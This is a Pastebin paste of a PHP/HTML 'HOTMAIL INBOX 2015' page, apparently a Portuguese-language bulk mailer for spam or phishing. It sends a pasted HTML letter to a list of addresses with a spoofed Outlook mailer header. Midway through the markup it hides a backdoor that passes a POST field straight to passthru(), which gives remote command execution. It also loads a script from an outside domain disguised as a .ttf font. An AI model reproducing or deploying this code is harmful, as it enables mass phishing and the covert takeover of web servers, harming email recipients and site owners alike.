Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $testa = $_POST['veio'];
- if($testa != "") {
- $message = $_POST['html'];
- $subject = $_POST['assunto'];
- $nome = $_POST['nome'];
- $de = $_POST['de'];
- $to = $_POST['emails'];
- $email = explode("\n", $to);
- $message = stripslashes($message);
- $i = 0;
- $count = 1;
- while($email[$i]) {
- $ok = "ok";
- $headers = "MIME-Version: 1.0\n";
- $headers .= "Content-type: text/html; charset=iso-8859-1\n";
- $headers .= "X-Mailer: Microsoft Office Outlook, Build 17.551210\n";
- $headers .= "From: ".$email[$i]."\r\n";
- if(mail($email[$i], $subject, $message, $headers))
- echo "<font color=#FFFFFF>* Status: $count <b>".$email[$i]."</b> <font color=#FFFFFF>SENT....!</font><br><hr>";
- else
- echo "<font color=#000000>* Status: $count <b>".$email[$i]."</b> <font color=#000000>Not SENT</font><br><hr>";
- $i++;
- $count++;
- }
- $count--;
- if($ok == "ok")
- echo "[Fim do Envio]";
- }
- ?>
- <html>
- <head>
- <title>HOTMAIL INBOX 2015 (w32.info)</title>
- <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
- <script src='http://www.w32.info/site/jquery1000/AlHurra-Font_Light.ttf'></script>
- <style>
- body {
- margin-left: 0;
- margin-right: 0;
- margin-top: 0;
- background-color: #801235;
- margin-bottom: 0;
- }
- .titulo {
- font-family: Arial, Helvetica, sans-serif;
- font-size: 70px;
- color: #FFFFFF;
- font-weight: bold;
- }
- .normal {
- font-family: Arial, Helvetica, sans-serif;
- font-size: 12px;
- color: #008000;
- }
- .form {
- font-family: Arial, Helvetica, sans-serif;
- font-size: 10px;
- color: #000000;
- background-color: #FFFFFF;
- border: 1px dashed #666666;
- }
- .texto {
- font-family: Verdana, Arial, Helvetica, sans-serif;
- font-weight: bold;
- }
- .alerta {
- font-family: Verdana, Arial, Helvetica, sans-serif;
- font-weight: bold;
- color: #990000;
- font-size: 10px;
- }
- .auto-style1 {
- padding: 0;
- font-family: Impact, Haettenschweiler, "verdana", sans-serif;
- font-size: xx-large;
- color: #008000;
- font-weight: bold;
- }
- .auto-style3 {
- margin-left: 240px;
- }
- .auto-style4 {
- font-family: Impact, Haettenschweiler, "Arial Narrow Bold", sans-serif;
- }
- .auto-style5 {
- background-color: #77A27D;
- }
- .auto-style6 {
- font-family: Impact, Haettenschweiler, "Arial Narrow Bold", sans-serif;
- font-size: medium;
- }
- .auto-style7 {
- font-size: medium;
- }
- .auto-style9 {
- font-family: Impact, Haettenschweiler, "Arial Narrow Bold", sans-serif;
- font-size: medium;
- background-color: #000000;
- }
- .auto-style11 {
- font-family: Impact, Haettenschweiler, "Arial Narrow Bold", sans-serif;
- }
- .auto-style12 {
- border-width: 0px;
- }
- </style>
- </head>
- <body>
- <form action="" method="post" enctype="multipart/form-data" name="form1">
- <input type="hidden" name="veio" value="sim">
- <tr>
- <p> </p>
- <table border="0" width="53%" bordercolorlight="#000000" bordercolordark="#000000" style="border: 1px ridge #FFFFFF" bgcolor="#801235" class="auto-style3" >
- <td height="25" align="center" bgcolor="#FFFFFF" class="auto-style1" style="width: 462px">
- <font color="#801235" face="Vrinda">hotmail inbox</font></td>
- <tr align="left">
- <td colspan="2" style="width: 462px" >
- <b style="color: #801235; font-family: verdana; font-size: x-small; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFFFF;">
- Host:</b><span style="color: #FFFFFF; font-family: verdana; font-size: x-small; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #801235;"><span class="Apple-converted-space"> </span><?php echo @$_SERVER["HTTP_HOST"] ?></span><span style="background-color: #801235"><br style="color: #FFFFFF; font-family: verdana; font-size: x-small; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px; -webkit-text-stroke-width: 0px; ">
- </span>
- <b style="color: #801235; font-family: verdana; font-size: x-small; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFFFF;">
- IP:</b><span style="color: #FFFFFF; font-family: verdana; font-size: x-small; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #801235;"><span class="Apple-converted-space"> </span><?php echo gethostbyname($_SERVER["HTTP_HOST"]) ?></span><span style="background-color: #801235"><br style="color: #FFFFFF; font-family: verdana; font-size: x-small; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px; -webkit-text-stroke-width: 0px; ">
- </span>
- <b style="color: #801235; font-family: verdana; font-size: x-small; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFFFF;">
- Your ip:</b><span style="font-family: verdana; font-size: x-small; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #FFFFFF;"><span class="Apple-converted-space"><font color="#801235"> </font></span></span><span style="color: #FFFFFF; font-family: verdana; font-size: x-small; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #801235"><?php echo @$_SERVER["REMOTE_ADDR"]; ?></span><br class="auto-style6">
- <span class="auto-style4"><span class="auto-style5"><span class="auto-style7">
- </span></span></span>
- </center>
- <?php
- if ($_POST['message']){
- $message = $_POST['message'];
- passthru($message);
- }
- ?>
- </tr>
- <tr>
- <td height="194" valign="top" bgcolor="#801235" style="width: 462px">
- <table width="100%" border="0" cellpadding="0" cellspacing="5" class="normal" height="444" bgcolor="#801235">
- <tr>
- <td align="right" height="17">
- <font color="#801235">
- <span id="result_box3" class="short_text" lang="en" tabindex="-1">
- <span class="auto-style4"><font face="Verdana">
- <span style="background-color: #FFFFFF">subject</span></font></span></span><span class="texto"><font face="Verdana"><span style="background-color: #FFFFFF">:</span></font></span></font></td>
- <td height="17" bgcolor="#801235">
- <input name="assunto" type="text" value=""class="form" id="assunto" style="border-radius: 15px; width:100%" ></td>
- </tr>
- <tr align="center" bgcolor="#99CCFF">
- <td height="20" colspan="2" class="auto-style9" style="background-color: #801235">
- <font color="#801235" face="Verdana">
- <span style="background-color: #FFFFFF">Letter</span></font></td>
- </tr>
- <tr align="right">
- <td height="146" colspan="2" valign="top"><br>
- <textarea name="html" style="border-radius: 15px; width:100%" rows="8" wrap="VIRTUAL" class="form" id="html"></textarea><font color="#801235"><span style="background-color: #FFFFFF">
- </span></font>
- <span class="alerta"><font color="#801235">
- <span style="background-color: #FFFFFF">*</span></font><span id="result_box2" class="short_text" lang="en" tabindex="-1"><span style="background-color: #FFFFFF"><font color="#801235"><span class="hps">Reminder</span><span>:
- Text</span> </font> </span> <span class="hps"><font color="#801235">
- <span style="background-color: #FFFFFF">HTML</span></font></span></span></span></td>
- </tr>
- <tr align="center" bgcolor="#000000">
- <td height="10" colspan="2" bgcolor="#801235">
- <font color="#801235">
- <span id="result_box" class="short_text" lang="en" tabindex="-1">
- <span class="auto-style9"><font face="Verdana">
- <span style="background-color: #FFFFFF">Mailing List</span></font></span></span></font></tr>
- <tr align="right">
- <td height="136" colspan="2" valign="top"><br>
- <textarea name="emails" style="border-radius: 15px; width:100%" rows="8" wrap="VIRTUAL" class="form" id="emails"></textarea>
- <span class="alerta"><font color="#801235">
- <span style="background-color: #FFFFFF">*Listmail</span></font></span> </td>
- </tr>
- <tr>
- <td height="26" align="right" valign="top" colspan="2">
- <p align="center">
- <input type="submit" name="Submit" id="enviar" value="Send Message" style="text-decoration: underline; font-family: Verdana; background-color:#FFFFFF" dir="ltr"></td>
- </tr>
- </table>
- </td>
- </tr>
- <tr>
- <td height="15" align="center" bgcolor="#801235" style="width: 462px"> </td>
- </tr>
- </table>
- </form>
- </body>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement